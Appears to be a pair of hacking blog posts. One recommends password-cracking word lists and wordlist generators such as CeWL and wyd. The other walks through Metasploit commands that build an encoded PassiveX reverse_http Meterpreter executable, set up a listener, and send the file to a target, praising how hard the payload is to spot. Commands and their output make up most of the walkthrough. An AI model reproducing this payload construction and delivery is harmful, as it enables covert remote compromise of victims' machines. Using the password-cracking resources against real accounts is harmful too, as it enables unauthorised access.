Entries in Hacking (3)
Matt Weir and company created a cool tool that has the best of both worlds, Dictionary based Rainbow Tables with Dr-Crack, which you can find here:
But, back to the reason of this post, word lists. Where do you get them? Here are a couple of my favorite places in no particular order:
I like to keep 3 size word lists:
1. small and fast: usually based on the output of one of the tools i'm about to tell you about
2. medium: this is my custom list that I add passwords I find / crack and generally think are good to add. I'm pretty picky about what goes into this list
3. huge: any wordlist I come across gets added to this list, it gets sorted and uniqued and restored
Now the two tools that I like for the small list is are CeWL and wyd
CeWL - http://www.digininja.org/projects/cewl.php
Wyd - http://www.remote-exploit.org/codes_wyd.html
They have some very similar lists of features, your mileage may vary. But they basically parse files and web pages for words and generate password lists based on the words found.
I missed one hell of a treasure trove of word lists:
Right now, there list is this:
- http://hacor.org/docs/hugelist.txt (broken link. Does anyone have it hosted elsewhere?)
- By operat0r
http://wordlist.sourceforge.net/ (Kevin's Word Lists)
I posted this walkthrough to the Metasploit mailing list, but thought that it would serve well here as well. Especially with the recent iPhone 3.0 “Special” download spam I recently received. The binary comes out to a whopping 97 bytes for the stager. Would be a blazing fast download and coupled with the IExpress “hack” would make for an very hard to spot payload.
A really down and dirty explination of what PassiveX is and why it's useful in this sort of situation is that instead of making a direct connection back to you, it uses an iexplorer process with a cool ActiveX control to talk back. So someone looking for a rogue process will only see Internet Explorer open and talking over port 443 (as specified).
(props to skape for writting PassiveX and @_natron_ for kicking in the latest tweaks to make it work with IE7/IE8)
Here are the options for msfpayload:
Usage: ./msfpayload <payload> [var=val] <S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable|[V]BA>
And msfencode's options if you chose to use it as I demonstrate below. However, encoding happens by default with msfpayload (IIRC):
Usage: ./msfencode <options>
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-s <opt> The maximum size of the encoded data
-t <opt> The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba)
Here we create the PassiveX payload. Note the PX options instead of the LHOST/LPORT:
./msfpayload windows/reflectivemeterpreter/reverse_http PXHOST=192.168.1.100 PXPORT=443 PXURI=/ R | ./msfencode -t exe -o /tmp/maliciouspayload.exe
[*] x86/shikata_ga_nai succeeded with size 97 (iteration=1)
Now that we have our "malicious payload" in /tmp we get our listener ready (you can use msfcli as well, I just like msfconsole because it provides me more flexibility):
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
=[ msf v3.3-dev
+ -- --=[ 376 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 153 aux
msf > use multi/handler
msf exploit(handler) > exploit -h
(I'm showing you 'exploit's options because a lot of people don't know they exist. With two lines you can start your listener (use, then exploit):
Usage: exploit [options]
Launches an exploitation attempt.
-e <opt> The payload encoder to use. If none is specified, ENCODER is used.
-h Help banner.
-j Run in the context of a job.
-n <opt> The NOP generator to use. If none is specified, NOP is used.
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The payload to use. If none is specified, PAYLOAD is used.
-t <opt> The target index to use. If none is specified, TARGET is used.
-z Do not interact with the session after successful exploitation.
msf exploit(handler) > exploit -j -z -p windows/reflectivemeterpreter/reverse_http -o PXHOST=0.0.0.0,PXPORT=443,PXURI=/,ExitOnSession=False
[*] Exploit running as background job.
[*] PassiveX listener started.
[*] Starting the payload handler...
msf exploit(handler) >
Listener ready to go. I chose IP: 0.0.0.0 just to make things easy. Just send off maliciouspayload.exe to your target and you're set.